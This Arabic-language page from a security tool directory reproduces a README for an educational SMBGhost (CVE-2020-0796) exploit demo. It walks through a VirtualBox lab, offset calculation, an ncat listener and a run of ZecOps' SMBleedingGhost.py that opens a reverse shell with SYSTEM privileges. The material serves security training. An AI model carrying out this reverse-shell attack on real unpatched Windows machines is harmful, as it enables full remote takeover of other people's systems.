Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/tdevworks/cve-2020-0796-smbghost-exploit-demo
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليمأداة الوصول عن بعدتطوير الحمولاتاستغلال الملفات الثنائيةمختبرات وتدريب عملي
GitHub
tdevworks/cve-2020-0796-smbghost-exploit-demo

CVE-2020-0796-SMBGhost-Exploit-Demo

استغلال إثبات مفهوم تعليمي لـ CVE-2020-0796 (SMBGhost) يوضح تنفيذ التعليمات البرمجية عن بُعد قبل المصادقة على Windows SMBv3. يتضمن إعداد مختبر خطوة بخطوة وحساب الإزاحة وتنفيذ قشرة عكسية للتدريب الأمني الخاضع للتحكم.

عرض المستودع
35منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

عرض توضيحي لاستغلال CVE-2020-0796 (SMBGhost)

يعرض هذا المشروع إكسبلويت إثبات المفهوم (PoC) لثغرة CVE-2020-0796، المعروفة أيضًا باسم SMBGhost - وهي ثغرة حرجة لتنفيذ الكود عن بُعد (RCE) قبل المصادقة، تؤثر على أنظمة Windows 10 وWindows Server التي تستخدم SMBv3. تم تطوير هذا المشروع كجزء من مشروع أكاديمي في مجال الأمن السيبراني. يعود الفضل في كود الاستغلال بالكامل إلى ZecOps. لقد استخدمته وكيّفته فقط لأغراض تعليمية لعرض استغلال CVE-2020-0796 داخل بيئة مختبرية خاضعة للتحكم.

متطلبات العرض التوضيحي

لإعادة إنتاج هذا العرض التوضيحي، يلزم الإعداد التالي:

جهاز المهاجم

  • VirtualBox (باستخدام NATNetwork لشبكة الأجهزة الافتراضية)
  • Windows 10 (أي إصدار حديث)
  • Python 3.x (مضاف إلى PATH الخاص بالنظام)
  • Netcat (مضمّن مع Nmap أو مثبَّت بشكل منفصل)
  • نص برمجي للاستغلال من GitHub PoC:
    SMBleedingGhost.py بواسطة ZecOps

الجهاز المستهدف

  • VirtualBox (نفس إعداد NATNetwork)
  • Windows 10 الإصدار 1903، إصدار 19H1
    Build 18362.356 – 2019.09، الإصدار Home أو Pro (x64)
  • تعطيل جدار حماية Windows (للسماح بالوصول إلى المنفذ 445)
  • نص برمجي لحساب الإزاحات من GitHub PoC:
    بواسطة ZecOps
calc_target_offsets.bat

العرض التوضيحي: الاستغلال خطوة بخطوة

الخطوة 1: الحصول على عناوين IP للجهازين الافتراضيين

  1. افتح موجه الأوامر على كل من الجهازين الافتراضيين المهاجم والهدف.

  2. نفّذ الأمر التالي على كل جهاز:

    root@kitploit:~
    ipconfig
    

Screenshot 2025-05-16 172329

  1. سجّل عناوين IP الخاصة بالأجهزة الافتراضية — ستحتاجها في الخطوات اللاحقة.

الخطوة 2: حساب الإزاحات على الجهاز الهدف

  1. على الجهاز الهدف، انتقل إلى المجلد CVE-2020-0796-RCE-POC-master.
  2. انقر نقرًا مزدوجًا لتشغيل النص البرمجي: calc_target_offsets.bat
  • سيؤدي هذا إلى إنشاء إزاحات الذاكرة المطلوبة للاستغلال.
  • أبقِ النافذة مفتوحة وسجّل القيم المعروضة — ستحتاجها في الخطوة التالية.

Screenshot 2025-05-16 172350


الخطوة 3: تحديث النص البرمجي للاستغلال على جهاز المهاجم

  1. على جهاز المهاجم، افتح نفس المجلد CVE-2020-0796-RCE-POC-master.
  2. انقر بزر الماوس الأيمن على SMBleedingGhost.py وافتحه باستخدام المفكرة (Notepad).
  3. في ملف SMBleedingGhost.py، مرر لأسفل وحدد موقع القسم الذي يبدأ بـ OFFSETS = {.
  4. استبدل قيم الإزاحات الحالية بتلك التي حصلت عليها من الجهاز الهدف.
  5. احفظ الملف بعد التعديل.
  6. يمكنك الآن إغلاق نافذة الإزاحات على الجهاز الهدف.

Screenshot 2025-05-16 172403


الخطوة 4: تشغيل مستمع Netcat على جهاز المهاجم

افتح موجه أوامر جديدًا ونفّذ:

root@kitploit:~
ncat -lvp 4321
  • يُعدّ هذا مستمعًا على المنفذ 4321 لاستقبال قشرة عكسية من الجهاز الهدف عند نجاح الاستغلال.
  • يمكنك تغيير رقم المنفذ إذا لزم الأمر.

Screenshot 2025-05-16 172419


الخطوة 5: تنفيذ الاستغلال من جهاز المهاجم

  1. افتح موجه أوامر آخر وانتقل إلى دليل PoC (لقد حفظت دليلي على سطح المكتب):
root@kitploit:~
cd Desktop
cd CVE-2020-0796-RCE-POC-master
dir
  1. نفّذ الاستغلال باستخدام عناوين IP والمنفذ المناسبين:
root@kitploit:~
python SMBleedingGhost.py <target_ip> <attacker_ip> <port>

Screenshot 2025-05-16 172450

مثال مستخدم في هذا العرض التوضيحي:

root@kitploit:~
python SMBleedingGhost.py 192.168.18.61 192.168.18.62 4321
  • 192.168.18.61: عنوان IP للجهاز الهدف
  • 192.168.18.62: عنوان IP لجهاز المهاجم
  • 4321: المنفذ المستخدم في مستمع Netcat

نتيجة الاستغلال

إذا نجح الاستغلال، ستظهر نافذة Netcat:

root@kitploit:~
Microsoft Windows [Version 10.0.18362.356]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

مما يؤكد أن:

  • الجهاز الهدف تم استغلاله
  • يمتلك جهاز المهاجم الآن صلاحيات على مستوى النظام

يمكنك التحقق من الوصول عن طريق تنفيذ:

root@kitploit:~
whoami

وهذا سيعطي:

root@kitploit:~
whoami
nt authority\system

هذا يعني أن جهاز المهاجم يمتلك الآن صلاحيات على مستوى النظام على الجهاز الهدف.

Screenshot 2025-05-16 172512

يمكنك أيضًا تشغيل:

root@kitploit:~
ipconfig

للتحقق من أنك تتفاعل مع شبكة الجهاز الهدف.

Screenshot 2025-05-16 172550

ملاحظة: قد يتعطل الجهاز الهدف بعد الاستغلال. إذا حدث ذلك، يمكنك إعادة تشغيله. ستحتاج جلسة المهاجم إلى إعادة إنشائها بعد إعادة التشغيل.

شكر وتقدير

يعتمد هذا العرض التوضيحي على إثبات المفهوم المتاح للعموم الذي طوّره ZecOps.

يعود الفضل في كود الاستغلال بالكامل إلى ZecOps. لقد استخدمته وكيّفته فقط لأغراض تعليمية لعرض استغلال CVE-2020-0796 داخل بيئة مختبرية خاضعة للتحكم.

المراجع

  • CVE-2020-0796 إثبات مفهوم تنفيذ الكود عن بُعد (POC)

المؤلف

@tdevworks

إخلاء مسؤولية

تم إنشاء هذا المستودع لأغراض تعليمية فقط.

جميع الأدوات والنصوص البرمجية والتقنيات المعروضة تهدف إلى المساعدة في فهم الثغرات في مجال الأمن السيبراني في بيئة مختبرية خاضعة للتحكم. لا تحاول استخدام أي من المواد المقدمة على أنظمة أو شبكات لا تملكها أو ليس لديك إذن صريح لاختبارها.

لا يتحمل المؤلف أي مسؤولية عن سوء استخدام البرنامج.

تنزيل الأداة